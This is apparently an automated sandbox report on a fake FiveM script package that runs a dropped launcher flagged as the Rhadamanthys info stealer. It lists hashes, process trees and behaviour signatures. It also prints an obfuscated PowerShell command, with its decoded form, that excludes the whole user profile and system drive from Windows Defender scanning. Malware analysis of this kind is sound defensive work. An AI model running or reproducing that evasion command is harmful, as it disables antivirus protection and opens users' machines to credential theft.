Overview

Task scores:
  Overview                                      score 10
  Static                                        score 3
  SKRIPTGG-F...in.zip    windows7-x64           score 1
  SKRIPTGG-F...in.zip    windows10-2004-x64     score 1
  SKRIPTGG-F...DME.md    windows7-x64           score 3
  SKRIPTGG-F...DME.md    windows10-2004-x64     score 3
  SKRIPTGG-F...pt.rar    windows7-x64           score 10
  SKRIPTGG-F...pt.rar    windows10-2004-x64     score 7
  launcher.exe           windows7-x64           score 10
  launcher.exe           windows10-2004-x64     score 10
  SKRIPTGG-F...se.dll    windows7-x64           score 1
  SKRIPTGG-F...se.dll    windows10-2004-x64     score 1

Resubmissions
  27-03-2024 17:10   240327-vp3klabh7y   score 10
  27-03-2024 17:07   240327-vnfdnsbh4w   score 3
  27-03-2024 17:03   240327-vknwmsbg61   score 10

Analysis
  max time kernel:  66s
  max time network: 68s
  platform:         windows7_x64
  resource:         win7-20240215-en
  resource tags:    arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
  submitted:        27-03-2024 17:03
Tasks
  Task          Type             Sample                            Resource
  static1       Static task
  behavioral1   Behavioral task  SKRIPTGG-FIVEM-main.zip           win7-20240221-en
  behavioral2   Behavioral task  SKRIPTGG-FIVEM-main.zip           win10v2004-20240226-en
  behavioral3   Behavioral task  SKRIPTGG-FIVEM-main/README.md     win7-20240221-en
  behavioral4   Behavioral task  SKRIPTGG-FIVEM-main/README.md     win10v2004-20231215-en
  behavioral5   Behavioral task  SKRIPTGG-FIVEM-main/Skript.rar    win7-20240215-en
  behavioral6   Behavioral task  SKRIPTGG-FIVEM-main/Skript.rar    win10v2004-20240226-en
  behavioral7   Behavioral task  launcher.exe                      win7-20240221-en
  behavioral8   Behavioral task  launcher.exe                      win10v2004-20240226-en
  behavioral9   Behavioral task  SKRIPTGG-FIVEM-main/license.dll   win7-20240221-en
  behavioral10  Behavioral task  SKRIPTGG-FIVEM-main/license.dll   win10v2004-20240226-en
General
  Target:  SKRIPTGG-FIVEM-main/Skript.rar
  Size:    4.6MB
  MD5:     5ca1a9888343fce41dc19ee85d5728c6
  SHA1:    004851b9a5327782dfffc773c7d352c3de6fa341
  SHA256:  26ce31dad5149454c39376256c88397b1a2e6c4e8f66b42cbce9f2cd904132cc
  SHA512:  3d0b20640da4695b3a2c70e39269dd6a48777c97e451385c8aebc876a5db430744d594118f217185cb4816d6e9c12f7c254deccad8652b710fbb9f5a83a5bf46
  SSDEEP:  98304:xI/GiwtepY3UjkkABs7ieskoAPS1tgX3Fr1gnzWMbz4Y:xqlpY3UtA+GePS1tuunzWtY
Malware Config
Signatures

Rhadamanthys
  Rhadamanthys is an info stealer written in C++ first seen in August 2022.

Suspicious use of NtCreateUserProcessOtherParentProcess  1 IoCs
  description             pid   Process      procid_target
  PID 2712 created 1196   2712  svchost.exe  21

Executes dropped EXE  4 IoCs
  pid   Process
  1596  launcher.exe
  1940  explorer.exe
  2712  svchost.exe
  2288  explorer.exe

Loads dropped DLL  5 IoCs
  pid   Process
  1596  launcher.exe
  1596  launcher.exe
  1596  launcher.exe
  1940  explorer.exe
  2288  explorer.exe

UPX (yara_rule: upx)
  resource                                                                     yara_rule
  behavioral5/files/0x000500000001874a-66.dat                                  upx
  behavioral5/memory/2288-68-0x000007FEF61B0000-0x000007FEF6616000-memory.dmp  upx
  behavioral5/memory/2288-91-0x000007FEF61B0000-0x000007FEF6616000-memory.dmp  upx

Detects Pyinstaller  1 IoCs
  resource                                     yara_rule
  behavioral5/files/0x0030000000016813-37.dat  pyinstaller

Enumerates physical storage devices  1 TTPs
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses  10 IoCs
  pid   Process
  2572  7zFM.exe
  2608  powershell.exe
  2712  svchost.exe
  2712  svchost.exe
  2572  7zFM.exe
  2280  dialer.exe
  2280  dialer.exe
  2280  dialer.exe
  2280  dialer.exe
  2572  7zFM.exe

Suspicious behavior: GetForegroundWindowSpam  1 IoCs
  pid   Process
  2572  7zFM.exe

Suspicious use of AdjustPrivilegeToken  4 IoCs
  description                 pid   Process
  Token: SeRestorePrivilege   2572  7zFM.exe
  Token: 35                   2572  7zFM.exe
  Token: SeSecurityPrivilege  2572  7zFM.exe
  Token: SeDebugPrivilege     2608  powershell.exe

Suspicious use of FindShellTrayWindow  2 IoCs
  pid   Process
  2572  7zFM.exe
  2572  7zFM.exe

Suspicious use of WriteProcessMemory  40 IoCs (identical rows collapsed; the occurrences column gives the repeat count)
  description                       pid   Process       procid_target  occurrences
  PID 1624 wrote to memory of 2572  1624  cmd.exe       29             3
  PID 2572 wrote to memory of 1596  2572  7zFM.exe      32             7
  PID 1596 wrote to memory of 2608  1596  launcher.exe  33             7
  PID 1596 wrote to memory of 1940  1596  launcher.exe  35             4
  PID 1596 wrote to memory of 2712  1596  launcher.exe  36             7
  PID 1940 wrote to memory of 2288  1940  explorer.exe  37             3
  PID 2712 wrote to memory of 2280  2712  svchost.exe   38             9
Processes (indentation shows the parent/child depth)

C:\Windows\Explorer.EXE  C:\Windows\Explorer.EXE  (PID 1196)
  C:\Windows\system32\cmd.exe  cmd /c C:\Users\Admin\AppData\Local\Temp\SKRIPTGG-FIVEM-main\Skript.rar  (PID 1624)
    - Suspicious use of WriteProcessMemory
    C:\Program Files\7-Zip\7zFM.exe  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\SKRIPTGG-FIVEM-main\Skript.rar"  (PID 2572)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of WriteProcessMemory
      C:\Users\Admin\AppData\Local\Temp\7zOC0AD82E6\launcher.exe  "C:\Users\Admin\AppData\Local\Temp\7zOC0AD82E6\launcher.exe"  (PID 1596)
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAZgBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcgBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAYQBjACMAPgA="  (PID 2608)
          Decoded from the base64 UTF-16LE payload above: <#giz#>Add-MpPreference <#xfg#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#zrg#> -Force <#dac#>
          That is a Windows Defender exclusion covering the entire user profile and system drive; the <#...#> blocks are empty PowerShell comments inserted as padding.
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
        C:\Users\Admin\AppData\Local\Temp\explorer.exe  "C:\Users\Admin\AppData\Local\Temp\explorer.exe"  (PID 1940)
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious use of WriteProcessMemory
          C:\Users\Admin\AppData\Local\Temp\explorer.exe  "C:\Users\Admin\AppData\Local\Temp\explorer.exe"  (PID 2288)
            - Executes dropped EXE
            - Loads dropped DLL
        C:\Users\Admin\AppData\Local\svchost.exe  "C:\Users\Admin\AppData\Local\svchost.exe"  (PID 2712)
          - Suspicious use of NtCreateUserProcessOtherParentProcess
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\dialer.exe  "C:\Windows\system32\dialer.exe"  (PID 2280)
    - Suspicious behavior: EnumeratesProcesses
  C:\Windows\explorer.exe  "C:\Windows\explorer.exe"  (PID 2196)
Network
MITRE ATT&CK Enterprise v15
Downloads

  Filesize: 4.7MB
  MD5:      620024df612c13a4a33cf785384c2086
  SHA1:     a6ae999723bea18c6d3acf2c52ed682f6226b7be
  SHA256:   cd825788095cd61de39d98d6365ed80004cc55a64f4f115ef6bf532617bb0af1
  SHA512:   34d4d8a423d98bf0b8d4f18dc980bed97e9492f0817bb1e2dff99fc8d9d0cfaa2687514eff7717b1310a2c858236614490e980390612901e08b69b6ded451bdd

  Filesize: 1.4MB
  MD5:      3f782cf7874b03c1d20ed90d370f4329
  SHA1:     08a2b4a21092321de1dcad1bb2afb660b0fa7749
  SHA256:   2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6
  SHA512:   950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857

  Filesize: 4.4MB
  MD5:      aba4fcf0d72b487887f315202bc43ae4
  SHA1:     de51440c742c58f52f3b7cc2a1fcda5abd3d1ca8
  SHA256:   8f312c17c2a525ac9bc0838e4d9f69db5bb20478ffa4880fb3a8b98caf0e25ef
  SHA512:   fed41d5eb4a61c43bb3032c0d0b3d347d6b89a06d2928155f2e0baa59295ae71d3e689c3c78a584f2db64fd5ab3a06578623a8d41d7055b535c4d2317aef2bf9

  Filesize: 355KB
  MD5:      8a6f1580a5b9b94d7cd47cc6b1af1b9a
  SHA1:     e68768afd59e18091d345cb300e859572e8d4c5c
  SHA256:   bb1464e75c750d90c0c49d148c9e64eefe0c29b2f670d708c8085ddd3104dbfe
  SHA512:   1663a9e0868b3f5d7e1edd30259024e419c2d190ec8c31e76e66aef0c8a0e02da0c829584214b9e2f76cbd349a53bf77d01d03e9b0e9c8a99eb18021b1d53309